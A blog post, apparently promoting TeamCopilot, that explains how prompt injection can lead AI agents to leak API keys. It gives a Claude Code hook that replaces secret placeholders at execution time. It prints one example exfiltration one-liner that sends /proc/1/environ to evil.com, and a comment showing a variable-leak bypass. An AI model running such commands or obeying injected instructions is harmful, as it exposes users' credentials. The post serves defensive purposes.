Why Your AI Agent Should Never See Your API Keys

Most AI agent setups have a quiet security problem.

The natural setup: your credentials live in a .env file, and the agent can read it when it needs to make API calls. The agent reads the file, runs the command, and everything works.

1# .env
2OPENAI_API_KEY=sk-proj-abc123...
3STRIPE_SECRET_KEY=sk_live_xyz789...
4GITHUB_TOKEN=ghp_def456...

The problem: the moment the agent reads that file, all three values are in the LLM's context window.

"But I Trust Myself"

I'm the only one using this agent. Why does it matter?

You trust yourself, but you don't control everything your agent reads. Prompt injection is the attack that changes this calculation — a malicious actor just needs to get text in front of your agent that contains hidden instructions:

A webpage the agent fetches: 
A file in a repo the agent is analyzing
A dependency README with "helpful" instructions for AI coding assistants

If your OPENAI_API_KEY is in context when the agent reads that, it can be stolen.

The Fixes That Don't Work

Block tool access entirely. Breaks the point of having an agent.

Allowlist specific commands. Agents are creative. Block curl and the model tries:

1python3 -c "import urllib.request; urllib.request.urlopen('http://evil.com?k=' + open('/proc/1/environ').read())"

Redact secrets in logs. The most dangerously incomplete fix. Redaction happens after the model has already seen the value. You're just hiding evidence.

The Secret Proxy Pattern

The agent should never receive plaintext secret values. Instead of OPENAI_API_KEY=sk-proj-abc123, give it only the name. The agent uses placeholders like {{SECRET:OPENAI_API_KEY}} in its commands. A trusted runtime hook intercepts each command before execution, resolves the placeholder, and injects the real value as an env var into the subprocess — without the value ever appearing in the command string or the agent's context.

How It Works in Practice

1. Brief the agent on names only. The system prompt lists key names, never values:

1Available secret keys: SENDGRID_API_KEY, STRIPE_SECRET_KEY
2Use {{SECRET:KEY_NAME}} in bash commands to reference them.

2. Agent writes commands with placeholders:

1curl -X POST https://api.sendgrid.com/v3/mail/send \
2  -H "Authorization: Bearer {{SECRET:SENDGRID_API_KEY}}" \
3  -H "Content-Type: application/json" \
4  -d '{"to": [{"email": "user@example.com"}], ...}'

3. The hook rewrites and injects before execution. This is the core of the pattern. The hook first rejects any command that already contains __INTERNAL_SECRET_ — this closes a bypass where the agent pre-inserts the internal variable name alongside a legitimate placeholder to leak the resolved value. Then it scans for {{SECRET:KEY}} placeholders and checks each one against an allowlist of safe positions (curl Authorization/X-Api-Key headers). Any placeholder outside a safe position causes the command to be rejected.

For placeholders in safe positions, the hook does two things:

Rewrites {{SECRET:SENDGRID_API_KEY}} → $__INTERNAL_SECRET_SENDGRID_API_KEY in the command string
Injects the real value under that internal name as an env var into the subprocess shell

So the agent-visible command stays:

1curl -H "Authorization: Bearer {{SECRET:SENDGRID_API_KEY}}" ...

But what actually executes is:

1(export __INTERNAL_SECRET_SENDGRID_API_KEY='sk-live-...'; curl -H "Authorization: Bearer $__INTERNAL_SECRET_SENDGRID_API_KEY" ...)

The raw value only ever exists in the subprocess environment — never in the command string, never in logs, never in anything the agent can read back.

The Trust Boundary

1┌─────────────────────────────────┐    ┌──────────────────────────────────┐
2│         LLM (untrusted)         │    │     Runtime Hook (trusted)        │
3│                                 │    │                                   │
4│  Sees: {{SECRET:OPENAI_API_KEY}}│───▶│  Injects real value as env var   │
5│  Writes bash with placeholders  │    │  Rejects unsafe placeholder use   │
6│  Can be prompt-injected         │    │  Logs show placeholder only       │
7└─────────────────────────────────┘    └──────────────────────────────────┘

Even if an attacker successfully injects instructions into the agent's context, the best they can exfiltrate is {{SECRET:OPENAI_API_KEY}}. That string is worthless.

Implement It in Claude Code in 5 Minutes

Claude Code supports a PreToolUse hook that intercepts bash commands before they execute.

Step 1: Create a local secrets file the agent cannot read directly. Add a honeytoken so you'll know if it's accessed (see our previous post on honeytokens):

1mkdir -p ~/.agent-secrets
2cat > ~/.agent-secrets/secrets.env << 'EOF'
3OPENAI_API_KEY=sk-proj-your-real-key
4GITHUB_TOKEN=ghp_your-real-token
5# HONEYTOKEN: your-uuid-here
6EOF
7chmod 600 ~/.agent-secrets/secrets.env

Step 2: Create the resolver hook at ~/.claude/hooks/resolve-secrets.sh:

1#!/bin/bash
2
3# Read the tool input JSON from stdin
4INPUT=$(cat)
5COMMAND=$(echo "$INPUT" | jq -r '.tool_input.command // ""')
6
7# Check if command contains any {{SECRET:KEY}} placeholders
8if ! echo "$COMMAND" | grep -qE '\{\{SECRET:[A-Z0-9_]+\}\}'; then
9  # No placeholders — pass through unchanged
10  echo "$INPUT"
11  exit 0
12fi
13
14# Reject any command that already references $__INTERNAL_SECRET_.
15# This closes the bypass where the agent pre-inserts the internal var name
16# alongside a legitimate placeholder to leak the resolved value, e.g.:
17#   curl -H "Authorization: Bearer {{SECRET:KEY}}" api.com \
18#     && echo $__INTERNAL_SECRET_KEY > /tmp/leak.txt
19if echo "$COMMAND" | grep -qE '\$__INTERNAL_SECRET_'; then
20  echo "Error: Command references internal secret variable names directly." >&2
21  exit 1
22fi
23
24# Only resolve placeholders in known-safe positions:
25# curl Authorization/X-Api-Key headers: -H "Authorization: Bearer {{SECRET:KEY}}"
26
27# Find all placeholders in the command
28ALL_KEYS=$(echo "$COMMAND" | grep -oE '\{\{SECRET:[A-Z0-9_]+\}\}' | sort -u)
29
30# Find placeholders that appear in safe header positions only
31SAFE_KEYS=$(echo "$COMMAND" | \
32  grep -oE '\-H "[^"]*(Authorization|X-Api-Key|X-Auth-Token)[^"]*\{\{SECRET:[A-Z0-9_]+\}\}[^"]*"' | \
33  grep -oE '\{\{SECRET:[A-Z0-9_]+\}\}' | sort -u)
34
35# Reject if any placeholder appears outside a safe position
36UNSAFE=$(comm -23 <(echo "$ALL_KEYS") <(echo "$SAFE_KEYS"))
37if [[ -n "$UNSAFE" ]]; then
38  echo "Error: Secret placeholders used in unsafe positions: $UNSAFE" >&2
39  echo "Placeholders may only appear in curl Authorization/X-Api-Key headers." >&2
40  exit 1
41fi
42
43# Load secrets
44source ~/.agent-secrets/secrets.env
45
46# Rewrite placeholders to internal $__INTERNAL_SECRET_KEY references and
47# collect export statements. We use an unpredictable internal prefix so the
48# agent cannot guess or pre-insert the variable name.
49# We wrap in a subshell so the exports are in scope when the var is expanded —
50# a bare "KEY=value command $KEY" would expand $KEY in the current shell
51# before the assignment takes effect, leaving it empty.
52EXPORTS=""
53REWRITTEN="$COMMAND"
54while IFS= read -r placeholder; do
55  [[ -z "$placeholder" ]] && continue
56  KEY="${placeholder//\{\{SECRET:/}"
57  KEY="${KEY//\}\}/}"
58  INTERNAL_VAR="__INTERNAL_SECRET_$KEY"
59  VALUE="${!KEY}"
60  if [[ -z "$VALUE" ]]; then
61    echo "Error: Missing secret $KEY. Add it to ~/.agent-secrets/secrets.env" >&2
62    exit 1
63  fi
64  # Rewrite placeholder to the internal variable reference (never the raw value)
65  REWRITTEN="${REWRITTEN//\{\{SECRET:$KEY\}\}/\$$INTERNAL_VAR}"
66  # Collect export for subshell injection
67  EXPORTS+="export $INTERNAL_VAR=$(printf '%q' "$VALUE"); "
68done <<< "$SAFE_KEYS"
69
70# Wrap in a subshell: exports run first, then the rewritten command.
71# The raw secret values appear only in the export statements.
72FINAL_COMMAND="($EXPORTS $REWRITTEN)"
73
74# Output the modified tool input
75echo "$INPUT" | jq --arg cmd "$FINAL_COMMAND" '.tool_input.command = $cmd'

Step 3: Register the hook in ~/.claude/settings.json:

1{
2  "hooks": {
3    "PreToolUse": [
4      {
5        "matcher": "Bash",
6        "hooks": [
7          {
8            "type": "command",
9            "command": "bash ~/.claude/hooks/resolve-secrets.sh"
10          }
11        ]
12      }
13    ]
14  }
15}

Step 4: Make it executable:

1chmod +x ~/.claude/hooks/resolve-secrets.sh

Now you can instruct Claude Code (via your project's CLAUDE.md or system prompt) to use {{SECRET:KEY_NAME}} in bash commands instead of asking you for values or reading environment variables directly. The hook resolves them transparently at execution time.

How TeamCopilot Does It

TeamCopilot implements this pattern at the platform level:

Per-user secret storage. Every user gets a Profile Secrets page where they store personal API keys. Engineers can additionally manage global secrets visible across the team. Per-user secrets override globals when keys conflict — so a developer can test with their own OpenAI key without touching the team's production key.

Bash command proxy. For ad-hoc bash commands, TeamCopilot uses the {{SECRET:KEY}} placeholder pattern with a pre-execution hook, exactly as described above. Placeholders are only resolved in trusted positions — such as HTTP authorization headers — and rejected everywhere else.

Custom workflows as an escape hatch. For use cases where the bash proxy's allowlist isn't flexible enough, the agent can author custom workflows — Python scripts that declare required_secrets and use those values however the logic requires. This is secure because all workflows must be reviewed and approved by an engineer before they can run. The engineer is the trust boundary: once a workflow is approved, its secret usage is considered vetted.

The core insight is this: the LLM is a code generator, not a secret manager. It doesn't need to know your API keys to use them — it just needs to know their names. The substitution can happen in a layer it never touches.

If you're building on top of AI agents and injecting raw credentials into context today, this is worth fixing. The attack surface is real, prompt injection is not going away, and the pattern to fix it is straightforward.

Support the project

If this was useful, star TeamCopilot on GitHub.

TeamCopilot is a shared AI agent for teams with centralized context, permissions, and workflows.

Star on GitHub